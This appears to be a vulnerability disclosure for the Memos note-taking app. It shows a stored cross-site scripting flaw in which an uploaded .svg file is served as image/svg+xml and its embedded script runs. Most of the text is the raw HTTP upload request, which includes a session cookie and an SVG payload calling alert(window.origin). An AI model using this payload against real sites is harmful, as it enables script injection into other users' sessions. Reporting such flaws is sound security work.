When user upload a file with .svg extension and direct access this file, the server response with Content-type: image/svg+xml lead to processing SVG as HTML file
POST /api/resource HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MTUzMjkzMXxEdi1EQkFFQ180UUFBUkFCRUFBQUhfLUVBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOG89fDYqserGzpcgkE9G0qSf_dQ9Q8rHAMeM_lb9V-vZecyd
Content-Length: 462
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFu7Yl3xXBKej60Xw
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.usememos.com
Referer: https://demo.usememos.com/?text=1&shortcutId=1
Accept-Encoding: gzip, deflate
------WebKitFormBoundaryFu7Yl3xXBKej60Xw
Content-Disposition: form-data; name="file"; filename="xss.svg"
Content-Type: image/svg+xml
<svg width="100%" height="100%" viewBox="0 0 100 100"
xmlns="http://www.w3.org/2000/svg">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>
<script type="text/javascript">
// <![CDATA[
alert(window.origin);
// ]]>
</script>
</svg>
------WebKitFormBoundaryFu7Yl3xXBKej60Xw--